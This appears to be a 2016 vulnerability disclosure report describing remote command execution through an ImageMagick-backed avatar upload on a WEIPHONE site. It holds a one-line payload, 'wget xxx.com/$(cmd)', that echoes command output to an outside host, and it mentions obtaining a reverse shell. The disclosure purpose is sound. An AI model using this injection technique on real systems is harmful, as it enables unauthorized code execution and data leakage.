漏洞标题 Weiphone在哪里执行 相关制造商 WEIPHONE 漏洞作者 过路人 提交时间 2016-05-05 18: 27 公共时间 2016-06-19 21: 20 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 远程命令执行 漏洞详细信息 构建图片
找到一个调用imagemagick并上传它的头像上传点。
弹回壳 漏洞证明:
使用wget xxx.com/$(cmd)来回显示 修理计划: 根据官方imagemagick办公室 版权声明:请注明出处。居民A @乌云